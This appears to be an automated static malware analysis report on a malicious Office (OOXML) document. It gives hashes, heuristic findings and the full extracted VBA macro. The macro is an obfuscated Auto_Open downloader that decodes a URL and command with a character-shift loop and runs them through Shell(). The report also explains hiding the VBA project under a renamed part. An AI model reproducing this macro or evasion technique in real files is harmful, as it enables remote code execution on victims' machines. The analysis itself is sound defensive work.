Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9c0908df49cb5350…

MALICIOUS

Office (OOXML)

14.2 KB First seen: 2021-11-21
MD5: 94f2b935a0b2f5519af88c4e051497bf SHA-1: a13e07764a6f25b3164372e454fc23667aa87bb0 SHA-256: 9c0908df49cb5350eee92073e1eaf84552d8fedb8427f0a90efa86c1b2952495
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The OOXML file contains a VBA macro within a renamed VBA project part, indicating an attempt to evade detection. The Auto_Open macro is triggered upon opening, and it utilizes a character-shift decoder to construct and execute a command via the Shell() function. The decoded command appears to be a download and execution sequence, likely fetching a second-stage payload from the reconstructed URLs.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/kaodkaodkoaksdoaksoda.b)
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELL
    VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2952 bytes
SHA-256: cc3a500afc0dc03f0600d5a814cd54aed0c8376030732c5498b3cec972fbcac1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
Debug.Print MsgBox(qXglP77Xz("LYYVY(", "7"), vbOKCancel); returns; 1
Dim ynqvxPcX4 As String
Dim IztWb1wSm As String
Dim xrFCm28Ci As String
ynqvxPcX4 = qXglP77Xz("KBd qvlw {d{�{|mu;:dkitk6m€md66du{p|i(", "8")
IztWb1wSm = qXglP77Xz("jvvru<11yyy0dkvn{0eqo1", "2")
xrFCm28Ci = "wjdliwjdaalijwdlidj"
Debug.Print ynqvxPcX4
Debug.Print IztWb1wSm
Debug.Print xrFCm28Ci
Debug.Print (Shell(ynqvxPcX4 + IztWb1wSm + xrFCm28Ci))
End Sub
Public Function qXglP77Xz(UE2EtbVNL As String, Rb47W0TWO As Integer)
    Dim wDJHxwWIO As Integer
    For wDJHxwWIO = 1 To Len(UE2EtbVNL)

GoTo hFAdfMSltiOKKINFMd
hFAdfMSltiOKKINFMd:
GoTo piepGUqeoLGklRmrzpU:
olThGGiqDfeCTuUgasbxhsyuF:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo mtvEcQACjpIQFlhhfkVc
mQrdtwzrPtYDsMCtHRAAnaBYkygx:
GoTo BbOMGZVsOntpAD
dQpmIfDvrDTjEsBZTxz:

PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"

GoTo RRgXZRqTwydSmdUhsb
RRgXZRqTwydSmdUhsb:
GoTo fdiFLSxKJagYwLEpQZtV
TvPuSkwlicurOyIOK:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo noJLUsZCSzFZhVBxxwAm
noJLUsZCSzFZhVBxxwAm:
        Mid(UE2EtbVNL, wDJHxwWIO, 1) = Chr(Asc(Mid(UE2EtbVNL, wDJHxwWIO, 1)) - Rb47W0TWO)
GoTo mQrdtwzrPtYDsMCtHRAAnaBYkygx
mtvEcQACjpIQFlhhfkVc:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo AbaqgjbzdHFnwmdrBkkQQy
piepGUqeoLGklRmrzpU:

PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"

GoTo aOOpwKmGlJbnbZTliF
aOOpwKmGlJbnbZTliF:
GoTo olThGGiqDfeCTuUgasbxhsyuF
REfBAdJcNRr:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo dQpmIfDvrDTjEsBZTxz
AbaqgjbzdHFnwmdrBkkQQy:

wxGfLpElrKSIojk = "nYQCdOfjldCfJ"

GoTo oAFCNefBCLjQtJpyPX
oAFCNefBCLjQtJpyPX:
GoTo TvPuSkwlicurOyIOK
uHGQbeUuJCmTVrTYmwQ:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo REfBAdJcNRr
BbOMGZVsOntpAD:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo opzIDhwPkCxmSbcafPJ
opzIDhwPkCxmSbcafPJ:

wxGfLpElrKSIojk = "nYQCdOfjldCfJ"

GoTo NsnomrcVdHiTjnphHj
NsnomrcVdHiTjnphHj:
GoTo uHGQbeUuJCmTVrTYmwQ
fdiFLSxKJagYwLEpQZtV:

    Next wDJHxwWIO

GoTo OuiDtkJrreRrObpWna
OuiDtkJrreRrObpWna:
GoTo VsOntpADSopzIDhwPkCx:
hnuZmlBFHzZngQyAU:
    qXglP77Xz = UE2EtbVNL
GoTo CPMvIiiJRfGbFev
iLNtNTbQwFGE:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo hnuZmlBFHzZngQyAU
QkshMIIHLxDKcCBRH:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo CbEjhODYNESdLLyza
sgRtPOqYpbf:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo grlDAQsQJFQixSFP
CPMvIiiJRfGbFev:
GoTo wHBTCaJTaVhyNUQgDyce
vQrVuMYMJDV:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo qakqmyOPlnwTBeubhAI
grlDAQsQJFQixSFP:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo iLNtNTbQwFGE
VsOntpADSopzIDhwPkCx:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo rjHQPzikEhmzJ
rjHQPzikEhmzJ:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo sgRtPOqYpbf
CbEjhODYNESdLLyza:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo vQrVuMYMJDV
wHBTCaJTaVhyNUQgDyce:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo QkshMIIHLxDKcCBRH
qakqmyOPlnwTBeubhAI:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo SbcafPJQuHGQ
SbcafPJQuHGQ:

End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/kaodkaodkoaksdoaksoda.b 26624 bytes
SHA-256: 272d118d3aa999bb62183aae46415abdf2ed5308d1b8f2350149f8a77cd058e6

Open this report in the interactive analyzer, or submit your own file for analysis.